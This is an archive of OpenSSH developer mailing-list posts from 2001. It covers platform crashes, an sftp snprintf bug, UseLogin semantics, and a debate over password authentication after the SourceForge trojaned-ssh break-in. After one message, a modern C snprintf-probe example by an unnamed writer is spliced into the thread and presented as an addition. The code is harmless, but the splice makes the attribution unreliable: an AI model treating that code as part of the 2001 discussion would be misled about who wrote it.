From CLAD at chevron.com Fri Jun 1 00:20:33 2001
From: CLAD at chevron.com (Ladner, Eric (CLAD))
Date: Thu, 31 May 2001 07:20:33 -0700
Subject: Upgraded to 2.9p1 with no luck..
Message-ID: <8F88657F29DFD11189ED0008C728C6B006E01C2A@chevron.com>

The weird thing is it seems to be dying in the deflate function of the
zlib directory. I've been running the same zlib library for well over
a year (zlib 1.1.3, compiled from pristine source). I recompiled the
library but that didn't seem to help. I turned on packet debugging
and put some extra debug messages in, but it definitely dies in the
compress routine calling the deflate() function.

Thoughts?

-----Original Message-----
From: Lutz Jaenicke [mailto:Lutz.Jaenicke at aet.TU-Cottbus.DE]
Sent: Friday, May 25, 2001 2:27 PM
To: 'openssh-unix-dev at mindrot.org'
Subject: Re: Upgraded to 2.9p1 with no luck..

On Fri, May 25, 2001 at 12:04:57PM -0700, Ladner, Eric (CLAD) wrote:
> After upgrading to 2.9 (OpenSSH_2.9p1, SSH protocols 1.5/2.0, OpenSSL
> 0x0090600f)
> I'm unable to ssh between two systems any more (the two that I've upgraded).
> Below are some relevant snippets of debugging output around where the error
> occurs.
> Feel free to contact me regarding any additional information required.
>
> Output from "ssh -v -v -v pgppt" executed on a HP C240 workstation (HP-UX
> 11.0,
> PA-RISC 1.1):

I am running 2.9p1 on HP-UX 10.20 (platforms are from 710 to C200), so
there is a certain probability that we can get it to run :-)

> debug1: channel 0: new [client-session]
> debug1: channel_new: 0
> debug1: send channel open 0
> Memory fault

This is the point to step into debugging. From a Memory fault you should
either get a core dump (but ssh is suid root, so you probably won't get
one) or you can run it under a debugger and will end up at the location
causing the memory fault. You must perform this as root, since ssh is
suid root.

Best regards,
	Lutz
--
Lutz Jaenicke                             Lutz.Jaenicke at aet.TU-Cottbus.DE
BTU Cottbus               http://www.aet.TU-Cottbus.DE/personen/jaenicke/
Lehrstuhl Allgemeine Elektrotechnik                  Tel. +49 355 69-4129
Universitaetsplatz 3-4, D-03044 Cottbus              Fax. +49 355 69-4153

From george at esa.nascom.nasa.gov Fri Jun 1 01:00:08 2001
From: george at esa.nascom.nasa.gov (George Dimitoglou)
Date: Thu, 31 May 2001 11:00:08 -0400 (EDT)
Subject: OpenSSH, sftp problems
Message-ID: <200105311500.LAA05394@ruda.nascom.nasa.gov>

Hi -

We have been fighting this issue quite some time now and a posting on
the general list some months ago did not provide any answers. So I
thought the developers may have an insight.

We are in a Tru64 4.0F environment, running C2 security and TCP
Wrappers.

We are using OpenSSH_2.5.1p2
OpenSSL 0.9.5 28 Feb 2000
Zlib 1.1.3

for remote sessions and all works ok with ssh but we have many problems
with sftp.

Namely, the session ends when a user issues an 'ls' command during a
sftp session. The following debug output may give someone a hint.

Any help would be greatly appreciated.

host1.mydomain.com> sftp georged at machine.domain.gov

:
:
(snipped authentication output)
:
:
Sftp2/sftp2.c:2205: buffer: 'AUTHENTICATED YES
'
debug: SshTtyFlags/sshttyflags.c:294: Not a tty. (fd = 0)
sftp> ls
SshFCGlob/sshfc_glob.c:299: Adding file . to file list without globbing...
SshFCGlob/sshfc_glob.c:242: File list is at it's end.
SshFCGlob/sshfc_glob.c:76: Destroying global data...
SshFCRecurse/sshfc_recurse.c:180: File is "raw", and it needs to be parsed.
SshFCRecurse/sshfc_recurse.c:258: File . is a directory. Starting recursion...
SshFCRecurse/sshfc_recurse.c:877: Opening directory ....
.
Warning: ssh_packet_wrapper_input: invalid packet received: len 1399154545 closing the offending input channel.
SshFCRecurse/sshfc_recurse.c:972: Connection down, re-establishing...
FATAL: find_state_by_name: cannot find a state w/ name `fcr_lstat_file'.
host1.mydomain.com> debug: Ssh2ChannelSession/sshchsession.c:1306: received exit status : 139
debug: Ssh2Common/sshcommon.c:660: num_channels now 0
debug: Got session close with exit_status=139
debug: destroying client struct...
debug: uninitializing event loop

host1.mydomain.com>

----------------------------------------
George Dimitoglou
Emergent-IT, Space Sciences Division

SOHO ESA/NASA Project Scientist Team
Laboratory of Astronomy & Solar Physics
NASA Goddard Space Flight Center
Bldg. 26, G-1, Code 682.3
Greenbelt, MD 20771

george at esa.nascom.nasa.gov
----------------------------------------

From cmadams at hiwaay.net Fri Jun 1 01:26:22 2001
From: cmadams at hiwaay.net (Chris Adams)
Date: Thu, 31 May 2001 10:26:22 -0500
Subject: OpenSSH, sftp problems
In-Reply-To: <200105311500.LAA05394@ruda.nascom.nasa.gov>; from george@esa.nascom.nasa.gov on Thu, May 31, 2001 at 11:00:08AM -0400
References: <200105311500.LAA05394@ruda.nascom.nasa.gov>
Message-ID: <20010531102622.G31192@HiWAAY.net>

Once upon a time, George Dimitoglou said:
> We are in a Tru64 4.0F environment, running C2 security and TCP
> Wrappers.
>
> We are using OpenSSH_2.5.1p2
> OpenSSL 0.9.5 28 Feb 2000
> Zlib 1.1.3
>
> for remote sessions and all works ok with ssh but we have many problems
> with sftp.
>
> Namely, the session ends when a user issues an 'ls' command during a
> sftp session. The following debug output may give someone a hint.

It is fixed in OpenSSH 2.9p1. The problem is that sftp-server.c uses an
"ll" modifier in snprintf when printing a 64 bit integer. On 32 bit
platforms, "long long" is used for that type, which needs "ll". On 64
bit platforms (like Alpha), a 64 bit type is just a "long" and only
needs "l". Tru64 doesn't understand "ll" and segfaults when it sees it
(it actually could be used as a security hole I believe). OpenSSH 2.9p1
tests the library snprintf to see that it accepts "ll" and uses its own
version if "ll" doesn't work.
--
Chris Adams
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.
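The kind of "ll" probe Chris Adams describes, as an added example (my own code, not OpenSSH's or anything from this list): it checks whether the C library's snprintf formats a 64-bit value correctly under "%llu" and otherwise formats the number by hand, so a file size never depends on a length modifier the platform may not understand. Function names and the probe value are my choices.

```c
/* Added example: probe snprintf for "ll" support and fall back to a
 * hand-rolled 64-bit decimal formatter.  Not OpenSSH code. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Format v in decimal without using any printf length modifier.
 * Returns the number of characters written (excluding the NUL),
 * or -1 if buf is too small. */
int format_u64_portable(char *buf, size_t len, uint64_t v)
{
    char tmp[21];            /* 20 digits for 2^64-1, plus NUL */
    size_t n = 0;

    do {
        tmp[n++] = (char)('0' + (v % 10));
        v /= 10;
    } while (v != 0);

    if (n + 1 > len)
        return -1;

    /* digits were produced least-significant first; reverse them */
    for (size_t i = 0; i < n; i++)
        buf[i] = tmp[n - 1 - i];
    buf[n] = '\0';
    return (int)n;
}

/* Returns 1 if the C library's snprintf handles "%llu" for a value that
 * does not fit in 32 bits, 0 otherwise.  A libc that misparses "ll"
 * prints garbage (or, as reported for Tru64 in this thread, crashes),
 * which is why this belongs in a separate build-time test program. */
int snprintf_supports_ll(void)
{
    char got[32], want[32];
    const unsigned long long probe = 4294967296ULL;   /* 2^32 */

    format_u64_portable(want, sizeof want, probe);
    int r = snprintf(got, sizeof got, "%llu", probe);
    return r > 0 && (size_t)r < sizeof got && strcmp(got, want) == 0;
}

/* Format a 64-bit size the way a directory listing needs to, using the
 * libc formatter only when the probe says it is safe. */
int format_file_size(char *buf, size_t len, uint64_t size)
{
    if (snprintf_supports_ll()) {
        int r = snprintf(buf, len, "%llu", (unsigned long long)size);
        return (r >= 0 && (size_t)r < len) ? r : -1;
    }
    return format_u64_portable(buf, len, size);
}

/* Compiled on its own, this acts as a configure-style probe:
 * exit status 0 means "ll" is usable on this platform. */
int main(void)
{
    return snprintf_supports_ll() ? 0 : 1;
}
```

A crash inside snprintf cannot be caught from within the process that relies on it, so the probe is meant to run as its own program at build time, with the portable formatter selected when it fails.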
From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Thu, 31 May 2001 17:37:04 +0200
Subject: OpenSSH, sftp problems
In-Reply-To: <200105311500.LAA05394@ruda.nascom.nasa.gov>; from george@esa.nascom.nasa.gov on Thu, May 31, 2001 at 11:00:08AM -0400
References: <200105311500.LAA05394@ruda.nascom.nasa.gov>
Message-ID: <20010531173704.C17624@faui02.informatik.uni-erlangen.de>

What kind of sftp program is this?

looks like the commercial version and not openssh.

On Thu, May 31, 2001 at 11:00:08AM -0400, George Dimitoglou wrote:
>
> Hi -
>
> We have been fighting this issue quite some time now and a posting on
> the general list some months ago did not provide any answers. So I
> thought the developers may have an insight.
>
> We are in a Tru64 4.0F environment, running C2 security and TCP
> Wrappers.
>
> We are using OpenSSH_2.5.1p2
> OpenSSL 0.9.5 28 Feb 2000
> Zlib 1.1.3
>
> for remote sessions and all works ok with ssh but we have many problems
> with sftp.
>
> Namely, the session ends when a user issues an 'ls' command during a
> sftp session. The following debug output may give someone a hint.
>
>
> Any help would be greatly appreciated.
>
>
>
> host1.mydomain.com> sftp georged at machine.domain.gov
>
> :
> :
> (snipped authentication output)
> :
> :
> Sftp2/sftp2.c:2205: buffer: 'AUTHENTICATED YES
> '
> debug: SshTtyFlags/sshttyflags.c:294: Not a tty. (fd = 0)
> sftp> ls
> SshFCGlob/sshfc_glob.c:299: Adding file . to file list without globbing...
> SshFCGlob/sshfc_glob.c:242: File list is at it's end.
> SshFCGlob/sshfc_glob.c:76: Destroying global data...
> SshFCRecurse/sshfc_recurse.c:180: File is "raw", and it needs to be parsed.
> SshFCRecurse/sshfc_recurse.c:258: File . is a directory. Starting recursion...
> SshFCRecurse/sshfc_recurse.c:877: Opening directory ....
> .
> Warning: ssh_packet_wrapper_input: invalid packet received: len 1399154545 closing the offending input channel.
> SshFCRecurse/sshfc_recurse.c:972: Connection down, re-establishing...
> FATAL: find_state_by_name: cannot find a state w/ name `fcr_lstat_file'.
> host1.mydomain.com> debug: Ssh2ChannelSession/sshchsession.c:1306: received exit status : 139
> debug: Ssh2Common/sshcommon.c:660: num_channels now 0
> debug: Got session close with exit_status=139
> debug: destroying client struct...
> debug: uninitializing event loop
>
> host1.mydomain.com>
>
>
> ----------------------------------------
> George Dimitoglou
> Emergent-IT, Space Sciences Division
>
> SOHO ESA/NASA Project Scientist Team
> Laboratory of Astronomy & Solar Physics
> NASA Goddard Space Flight Center
> Bldg. 26, G-1, Code 682.3
> Greenbelt, MD 20771
>
> george at esa.nascom.nasa.gov
> ----------------------------------------
>
>

From george at esa.nascom.nasa.gov Fri Jun 1 01:41:26 2001
From: george at esa.nascom.nasa.gov (George Dimitoglou)
Date: Thu, 31 May 2001 11:41:26 -0400 (EDT)
Subject: OpenSSH, sftp problems
Message-ID: <200105311541.LAA05482@ruda.nascom.nasa.gov>

Hi Markus -

No, it is the free version.

George

>
> What kind of sftp program is this?
>
> looks like the commercial version and not openssh.
>
>
> On Thu, May 31, 2001 at 11:00:08AM -0400, George Dimitoglou wrote:
> >
> > Hi -
> >
> > We have been fighting this issue quite some time now and a posting on
> > the general list some months ago did not provide any answers. So I
> > thought the developers may have an insight.
> >
> > We are in a Tru64 4.0F environment, running C2 security and TCP
> > Wrappers.
> >
> > We are using OpenSSH_2.5.1p2
> > OpenSSL 0.9.5 28 Feb 2000
> > Zlib 1.1.3
> >
> > for remote sessions and all works ok with ssh but we have many problems
> > with sftp.
> >
> > Namely, the session ends when a user issues an 'ls' command during a
> > sftp session. The following debug output may give someone a hint.
> >
> >
> > Any help would be greatly appreciated.
> >
> >
> >
> > host1.mydomain.com> sftp georged at machine.domain.gov
> >
> > :
> > :
> > (snipped authentication output)
> > :
> > :
> > Sftp2/sftp2.c:2205: buffer: 'AUTHENTICATED YES
> > '
> > debug: SshTtyFlags/sshttyflags.c:294: Not a tty. (fd = 0)
> > sftp> ls
> > SshFCGlob/sshfc_glob.c:299: Adding file . to file list without globbing...
> > SshFCGlob/sshfc_glob.c:242: File list is at it's end.
> > SshFCGlob/sshfc_glob.c:76: Destroying global data...
> > SshFCRecurse/sshfc_recurse.c:180: File is "raw", and it needs to be parsed.
> > SshFCRecurse/sshfc_recurse.c:258: File . is a directory. Starting recursion...
> > SshFCRecurse/sshfc_recurse.c:877: Opening directory ....
> > .
> > Warning: ssh_packet_wrapper_input: invalid packet received: len 1399154545 closing the offending input channel.
> > SshFCRecurse/sshfc_recurse.c:972: Connection down, re-establishing...
> > FATAL: find_state_by_name: cannot find a state w/ name `fcr_lstat_file'.
> > host1.mydomain.com> debug: Ssh2ChannelSession/sshchsession.c:1306: received exit status : 139
> > debug: Ssh2Common/sshcommon.c:660: num_channels now 0
> > debug: Got session close with exit_status=139
> > debug: destroying client struct...
> > debug: uninitializing event loop
> >
> > host1.mydomain.com>
> >
> >
> > ----------------------------------------
> > George Dimitoglou
> > Emergent-IT, Space Sciences Division
> >
> > SOHO ESA/NASA Project Scientist Team
> > Laboratory of Astronomy & Solar Physics
> > NASA Goddard Space Flight Center
> > Bldg. 26, G-1, Code 682.3
> > Greenbelt, MD 20771
> >
> > george at esa.nascom.nasa.gov
> > ----------------------------------------
> >
> >
>

----------------------------------------
George Dimitoglou
Emergent-IT, Space Sciences Division

SOHO ESA/NASA Project Scientist Team
Laboratory of Astronomy & Solar Physics
NASA Goddard Space Flight Center
Bldg. 26, G-1, Code 682.3
Greenbelt, MD 20771

george at esa.nascom.nasa.gov
----------------------------------------

From Markus.Friedl at informatik.uni-erlangen.de Fri Jun 1 01:55:31 2001
From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Thu, 31 May 2001 17:55:31 +0200
Subject: OpenSSH, sftp problems
In-Reply-To: <200105311541.LAA05482@ruda.nascom.nasa.gov>; from george@esa.nascom.nasa.gov on Thu, May 31, 2001 at 11:41:26AM -0400
References: <200105311541.LAA05482@ruda.nascom.nasa.gov>
Message-ID: <20010531175531.D17624@faui02.informatik.uni-erlangen.de>

On Thu, May 31, 2001 at 11:41:26AM -0400, George Dimitoglou wrote:
> Hi Markus -
> No, it is the free version.

the free OpenSSH version does not print this:
are you sure this is not a bug in ssh.com's ssh?

> > > Sftp2/sftp2.c:2205: buffer: 'AUTHENTICATED YES
> > > '
> > > debug: SshTtyFlags/sshttyflags.c:294: Not a tty. (fd = 0)
> > > sftp> ls
> > > SshFCGlob/sshfc_glob.c:299: Adding file . to file list without
> globbing...
> > > SshFCGlob/sshfc_glob.c:242: File list is at it's end.
> > > SshFCGlob/sshfc_glob.c:76: Destroying global data...
> > > SshFCRecurse/sshfc_recurse.c:180: File is "raw", and it needs to be
> parsed.
> > > SshFCRecurse/sshfc_recurse.c:258: File . is a directory. Starting
> recursion...
> > > SshFCRecurse/sshfc_recurse.c:877: Opening directory ....
> > > .
> > > Warning: ssh_packet_wrapper_input: invalid packet received: len
> 1399154545 closing the offending input channel.
> > > SshFCRecurse/sshfc_recurse.c:972: Connection down, re-establishing...
> > > FATAL: find_state_by_name: cannot find a state w/ name `fcr_lstat_file'.
> > > host1.mydomain.com> debug: Ssh2ChannelSession/sshchsession.c:1306:
> received exit status : 139
> > > debug: Ssh2Common/sshcommon.c:660: num_channels now 0
> > > debug: Got session close with exit_status=139
> > > debug: destroying client struct...
> > > debug: uninitializing event loop
> > >
> > > host1.mydomain.com>
> > >
> > >
> > > ----------------------------------------
> > > George Dimitoglou
> > > Emergent-IT, Space Sciences Division
> > >
> > > SOHO ESA/NASA Project Scientist Team
> > > Laboratory of Astronomy & Solar Physics
> > > NASA Goddard Space Flight Center
> > > Bldg. 26, G-1, Code 682.3
> > > Greenbelt, MD 20771
> > >
> > > george at esa.nascom.nasa.gov
> > > ----------------------------------------
> > >
> > >
> >
>
> ----------------------------------------
> George Dimitoglou
> Emergent-IT, Space Sciences Division
>
> SOHO ESA/NASA Project Scientist Team
> Laboratory of Astronomy & Solar Physics
> NASA Goddard Space Flight Center
> Bldg. 26, G-1, Code 682.3
> Greenbelt, MD 20771
>
> george at esa.nascom.nasa.gov
> ----------------------------------------
>
>

From Lutz.Jaenicke at aet.TU-Cottbus.DE Fri Jun 1 02:13:47 2001
From: Lutz.Jaenicke at aet.TU-Cottbus.DE (Lutz Jaenicke)
Date: Thu, 31 May 2001 18:13:47 +0200
Subject: Upgraded to 2.9p1 with no luck..
In-Reply-To: <8F88657F29DFD11189ED0008C728C6B006E01C2A@chevron.com>; from CLAD@chevron.com on Thu, May 31, 2001 at 07:20:33AM -0700
References: <8F88657F29DFD11189ED0008C728C6B006E01C2A@chevron.com>
Message-ID: <20010531181346.B15511@ws01.aet.tu-cottbus.de>

On Thu, May 31, 2001 at 07:20:33AM -0700, Ladner, Eric (CLAD) wrote:
> The weird thing is it seems to be dying in the deflate function of the
> zlib directory. I've been running the same zlib library for well over
> a year (zlib 1.1.3, compiled from pristine source). I recompiled the
> library but that didn't seem to help. I turned on packet debugging
> and put some extra debug messages in, but it definitely dies in the
> compress routine calling the deflate() function.

The deflate() routine will deflate the data into preallocated memory,
so zlib may still be innocent...

> > Output from "ssh -v -v -v pgppt" executed on a HP C240 workstation (HP-UX
> > 11.0,
> > PA-RISC 1.1):

What compilers did you use?
(Wild guesses, because I am running out of ideas :-)

Best regards,
	Lutz
--
Lutz Jaenicke                             Lutz.Jaenicke at aet.TU-Cottbus.DE
BTU Cottbus               http://www.aet.TU-Cottbus.DE/personen/jaenicke/
Lehrstuhl Allgemeine Elektrotechnik                  Tel. +49 355 69-4129
Universitaetsplatz 3-4, D-03044 Cottbus              Fax. +49 355 69-4153

From CLAD at chevron.com Fri Jun 1 04:24:27 2001
From: CLAD at chevron.com (Ladner, Eric (CLAD))
Date: Thu, 31 May 2001 11:24:27 -0700
Subject: Upgraded to 2.9p1 with no luck..
Message-ID: <8F88657F29DFD11189ED0008C728C6B006E01C38@chevron.com>

The only one I have that will compile ANSI-C is gcc 2.95.2. I used
whatever default compile options that configure divined..

E

-----Original Message-----
From: Lutz Jaenicke [mailto:Lutz.Jaenicke at aet.TU-Cottbus.DE]
Sent: Thursday, May 31, 2001 11:14 AM
To: 'openssh-unix-dev at mindrot.org'
Subject: Re: Upgraded to 2.9p1 with no luck..

On Thu, May 31, 2001 at 07:20:33AM -0700, Ladner, Eric (CLAD) wrote:
> The weird thing is it seems to be dying in the deflate function of the
> zlib directory. I've been running the same zlib library for well over
> a year (zlib 1.1.3, compiled from pristine source). I recompiled the
> library but that didn't seem to help. I turned on packet debugging
> and put some extra debug messages in, but it definitely dies in the
> compress routine calling the deflate() function.

The deflate() routine will deflate the data into preallocated memory,
so zlib may still be innocent...

> > Output from "ssh -v -v -v pgppt" executed on a HP C240 workstation (HP-UX
> > 11.0,
> > PA-RISC 1.1):

What compilers did you use?
(Wild guesses, because I am running out of ideas :-)

Best regards,
	Lutz
--
Lutz Jaenicke                             Lutz.Jaenicke at aet.TU-Cottbus.DE
BTU Cottbus               http://www.aet.TU-Cottbus.DE/personen/jaenicke/
Lehrstuhl Allgemeine Elektrotechnik                  Tel. +49 355 69-4129
Universitaetsplatz 3-4, D-03044 Cottbus              Fax. +49 355 69-4153

From jelagor at att.net Fri Jun 1 05:39:41 2001
From: jelagor at att.net (jelagor at att.net)
Date: Thu, 31 May 2001 19:39:41 +0000
Subject: openssh 2.9 slow connections
Message-ID: <20010531193941.YAQX29100.mtiwmhc22.worldnet.att.net@webmail.worldnet.att.net>

To anyone,

I have installed openssh 2.9 on Solaris 2.7 and the default setup is
slow. It takes about 4-5 minutes to make the connection. I am connecting
to a Solaris 2.8 with openssh 2.3 on it. A RH Linux 6.2 version connects
to the same machine without the delay. Why?

I have seen other similar postings expressing delays in openssh 2.9.
ftp and telnet work fine as always with the same DNS setup as always.
Does openssh use reverse DNS? This may explain it.

Jim LaGore
jelagor at att.net

From tomh at po.crl.go.jp Fri Jun 1 12:24:49 2001
From: tomh at po.crl.go.jp (Tom Holroyd)
Date: Fri, 1 Jun 2001 11:24:49 +0900 (JST)
Subject: recent breakins
Message-ID:

From http://www.apache.org/info/20010519-hack.html:

"The ssh client at SourceForge had been compromised to log outgoing
names and passwords, so the cracker was thus able get a shell on
apache.org."

user's ssh --> SF's ssh --> apache.org's sshd

So basically the user's password was entered in the clear to an
untrusted program (SF's ssh). Never mind that the links were encrypted,
the ssh program on SF needed to know the user's password on apache.org,
in the clear.

Obviously, the user could have / should have run ssh locally to connect
directly to apache.org. But that's not the ideal solution. The ideal
solution requires that passwords should never, ever, be allowed to exist
in the clear anywhere but on the user's local machine. This is doable
now, over a single link, with SRP.

But what about multiple links? It should be possible to forward
authentication requests back to the user's keyboard. The SRP protocol
can be forwarded over any number of links, *even through a trojaned
ssh* without revealing any information that a cracker can use.

What mechanisms exist within ssh/sshd that would allow a remote sshd to
establish an authentication protocol conversation with a local ssh,
possibly over several links? Remember that the goal is that the user's
password should never appear in the clear on any computer other than
the user's own. Is this something that needs to be added to the agent?
Or can it be done directly within ssh?

From mugz at x-mafia.org Fri Jun 1 16:09:57 2001
From: mugz at x-mafia.org (mugz)
Date: Fri, 1 Jun 2001 02:09:57 -0400 (EDT)
Subject: another bug report
In-Reply-To: <20010524125150.D22475@folly>
Message-ID:

I tracked this one down. I am running OpenSSH_2.9p1 and if a user logs
in with securecrt and uses the "disconnect" button to disconnect from
the shell I get this error in the log:

Jun  1 01:47:35 members sshd[16130]: error: session_close_by_channel: kill 16131: Operation not permitted
Jun  1 01:47:35 members sshd[16130]: error: session_close_by_channel: kill 16131: Operation not permitted

Also, when I type:

last -30 | grep still

It shows them as still logged in, even though they have long since
disconnected. This error does not occur if they use "exit" to exit the
shell, also I do not see this same error in PuTTY.

mugz

From gert at greenie.muc.de Fri Jun 1 18:12:56 2001
From: gert at greenie.muc.de (Gert Doering)
Date: Fri, 1 Jun 2001 10:12:56 +0200
Subject: recent breakins
In-Reply-To: ; from Tom Holroyd on Fri, Jun 01, 2001 at 11:24:49AM +0900
References:
Message-ID: <20010601101256.B22854@greenie.muc.de>

Hi,

On Fri, Jun 01, 2001 at 11:24:49AM +0900, Tom Holroyd wrote:
> But what about multiple links? It should be possible to forward
> authentication requests back to the user's keyboard. The SRP protocol can
> be forwarded over any number of links, *even through a trojaned ssh*
> without revealing any information that a cracker can use.

Same with agent forwarding and using RSAAuthentication.

gert
--
USENET is *not* the non-clickable part of WWW!
                                                           //www.muc.de/~gert/
Gert Doering - Munich, Germany                             gert at greenie.muc.de
fax: +49-89-35655025                        gert.doering at physik.tu-muenchen.de

From tomh at po.crl.go.jp Fri Jun 1 18:52:50 2001
From: tomh at po.crl.go.jp (Tom Holroyd)
Date: Fri, 1 Jun 2001 17:52:50 +0900 (JST)
Subject: recent breakins
In-Reply-To: <20010601101256.B22854@greenie.muc.de>
Message-ID:

On Fri, 1 Jun 2001, Gert Doering wrote:

> On Fri, Jun 01, 2001 at 11:24:49AM +0900, Tom Holroyd wrote:
> > But what about multiple links? It should be possible to forward
> > authentication requests back to the user's keyboard. The SRP protocol can
> > be forwarded over any number of links, *even through a trojaned ssh*
> > without revealing any information that a cracker can use.
>
> Same with agent forwarding and using RSAAuthentication.

True. Too bad the guy wasn't using it. Why wasn't he using it?

Perhaps OpenSSH should simply disallow password authentication?

This type of man-in-the-middle attack (trojaned ssh) is not theoretical
anymore, and password authentication is broken.

The question is, can password authentication be (securely) forwarded? If
not, then we really should remove password authentication as an option.

From olemx at ans.pl Fri Jun 1 22:47:21 2001
From: olemx at ans.pl (Krzysztof Oledzki)
Date: Fri, 1 Jun 2001 14:47:21 +0200 (CEST)
Subject: Problem with OpenSSH with UseLogin.. AGAIN!!!
In-Reply-To: <20010526114913.A2514@folly>
Message-ID:

On Sat, 26 May 2001, Markus Friedl wrote:

> On Sat, May 26, 2001 at 12:15:42PM +1000, Andrew Bartlett wrote:
> > It's not a bug, it's a feature :-) Seriously, if UseLogin is selected
> > then the sys-admin has dictated that all authentications must pass through
> > /bin/login - usually for local security reasons. Disabling this kind of
> > defeats the purpose of the option.
>
> no, this is not true.
>
> use_login is ignored if you specify commands.
>
So? Someone will fix it!? It is quite stupid to keep this bug!!!

Best regards,

			Krzysztof Oledzki

From Markus.Friedl at informatik.uni-erlangen.de Fri Jun 1 22:48:52 2001
From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Fri, 1 Jun 2001 14:48:52 +0200
Subject: Problem with OpenSSH with UseLogin.. AGAIN!!!
In-Reply-To: ; from olemx@ans.pl on Fri, Jun 01, 2001 at 02:47:21PM +0200
References: <20010526114913.A2514@folly>
Message-ID: <20010601144852.A16295@faui02.informatik.uni-erlangen.de>

On Fri, Jun 01, 2001 at 02:47:21PM +0200, Krzysztof Oledzki wrote:
>
>
> On Sat, 26 May 2001, Markus Friedl wrote:
>
> > On Sat, May 26, 2001 at 12:15:42PM +1000, Andrew Bartlett wrote:
> > > It's not a bug, it's a feature :-) Seriously, if UseLogin is selected
> > > then the sys-admin has dictated that all authentications must pass through
> > > /bin/login - usually for local security reasons. Disabling this kind of
> > > defeats the purpose of the option.
> >
> > no, this is not true.
> >
> > use_login is ignored if you specify commands.
> >
> So? Someone will fix it!? It is quite stupid to keep this bug!!!

no, it's not a bug, it's a feature.

From pekkas at netcore.fi Fri Jun 1 23:08:16 2001
From: pekkas at netcore.fi (Pekka Savola)
Date: Fri, 1 Jun 2001 16:08:16 +0300 (EEST)
Subject: Problem with OpenSSH with UseLogin.. AGAIN!!!
In-Reply-To: <20010601144852.A16295@faui02.informatik.uni-erlangen.de>
Message-ID:

On Fri, 1 Jun 2001, Markus Friedl wrote:

> On Fri, Jun 01, 2001 at 02:47:21PM +0200, Krzysztof Oledzki wrote:
> >
> >
> > On Sat, 26 May 2001, Markus Friedl wrote:
> >
> > > On Sat, May 26, 2001 at 12:15:42PM +1000, Andrew Bartlett wrote:
> > > > It's not a bug, it's a feature :-) Seriously, if UseLogin is selected
> > > > then the sys-admin has dictated that all authentications must pass through
> > > > /bin/login - usually for local security reasons. Disabling this kind of
> > > > defeats the purpose of the option.
> > >
> > > no, this is not true.
> > >
> > > use_login is ignored if you specify commands.
> > >
> > So? Someone will fix it!? It is quite stupid to keep this bug!!!
>
> no, it's not a bug, it's a feature.

I think some people rely on UseLogin to perform additional login logging,
checking etc. For them, this might appear as a huuuge problem.

--
Pekka Savola                 "Tell me of difficulties surmounted,
Netcore Oy                   not those you stumble over and fall"
Systems. Networks. Security.  -- Robert Jordan: A Crown of Swords

From Markus.Friedl at informatik.uni-erlangen.de Fri Jun 1 23:37:35 2001
From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Fri, 1 Jun 2001 15:37:35 +0200
Subject: Problem with OpenSSH with UseLogin.. AGAIN!!!
In-Reply-To: ; from pekkas@netcore.fi on Fri, Jun 01, 2001 at 04:08:16PM +0300
References: <20010601144852.A16295@faui02.informatik.uni-erlangen.de>
Message-ID: <20010601153735.B16295@faui02.informatik.uni-erlangen.de>

On Fri, Jun 01, 2001 at 04:08:16PM +0300, Pekka Savola wrote:
> On Fri, 1 Jun 2001, Markus Friedl wrote:
>
> > On Fri, Jun 01, 2001 at 02:47:21PM +0200, Krzysztof Oledzki wrote:
> > >
> > >
> > > On Sat, 26 May 2001, Markus Friedl wrote:
> > >
> > > > On Sat, May 26, 2001 at 12:15:42PM +1000, Andrew Bartlett wrote:
> > > > > It's not a bug, it's a feature :-) Seriously, if UseLogin is selected
> > > > > then the sys-admin has dictated that all authentications must pass through
> > > > > /bin/login - usually for local security reasons. Disabling this kind of
> > > > > defeats the purpose of the option.
> > > >
> > > > no, this is not true.
> > > >
> > > > use_login is ignored if you specify commands.
> > > >
> > > So? Someone will fix it!? It is quite stupid to keep this bug!!!
> >
> > no, it's not a bug, it's a feature.
>
> I think some people rely on UseLogin to perform additional login logging,
> checking etc. For them, this might appear as a huuuge problem.

i don't think that ssh ever did this.

login is just used to update wtmp, print "you have new mail"

however, you cannot say
	/usr/bin/login user -c command
so you cannot use login(1) for command execution.

but for command execution, you don't need to touch wtmp or
print "you have new mail".

even the manpage says:

     UseLogin
             Specifies whether login(1) is used for interactive login ses-
             sions.  Note that login(1) is never used for remote command exe-
             cution.  The default is ``no''.

but it would be better if i never did accept the patch that
added use_login.......

From GILBERT.R.LOOMIS at saic.com Fri Jun 1 23:46:09 2001
From: GILBERT.R.LOOMIS at saic.com (Loomis, Rip)
Date: Fri, 1 Jun 2001 09:46:09 -0400
Subject: Disabling Password-based auth? (was RE: recent breakins)
Message-ID: <791BD3CB503DD411A6510008C7CF647701F40BE0@col-581-exs01.cist.saic.com>

All--

But it's not as simple as forwarding the password-based
authentication. Regardless of what method was used to
SSH from system one (user's) to system two (SF), the
user then started up *a second* SSH session to go
from two (SF) to three (Apache). There is no effective
way for any authentication information from the first
session to be passed to the second, in my mind.

Remember that the SF servers had suffered a root
compromise--so any non-password-based authentication
that would allow the user on the SF system to get to
the Apache systems could have been equally compromised.

The correct fix is *not* to disable password-based
authentication, but to ensure that users understand
that SSH is not a silver bullet. An SSH session should
generally only be initiated from a more secure system
to a less secure system--in my case, the system on my
desk is one that I have personally hardened and that
is closely monitored, so I have no problem using SSH
to go out to my ISP and read mail. I would think
*very* carefully before using SSH in reverse, since my
ISP's systems are (IMHO) much less secure.

I'm as appalled by what happened to SF and Apache as
anyone else, but I would ask that we work on the
user awareness issue, which I believe is the real
"root" problem (pardon the pun). For the cases
where someone needs to get from system A to system B
with some basic level of security and doesn't have any
other credentials/authentication available, there really
is no substitute for password-based authentication.

--
Rip Loomis
Brainbench MVP for Internet Security
http://www.brainbench.com (Transcript 1923411)

> -----Original Message-----
> From: Tom Holroyd [mailto:tomh at po.crl.go.jp]
> Sent: Friday, June 01, 2001 4:53 AM
> To: openssh-unix-dev at mindrot.org
> Subject: Re: recent breakins
>
>
> On Fri, 1 Jun 2001, Gert Doering wrote:
>
> > On Fri, Jun 01, 2001 at 11:24:49AM +0900, Tom Holroyd wrote:
> > > But what about multiple links? It should be possible to forward
> > > authentication requests back to the user's keyboard. The
> SRP protocol can
> > > be forwarded over any number of links, *even through a
> trojaned ssh*
> > > without revealing any information that a cracker can use.
> >
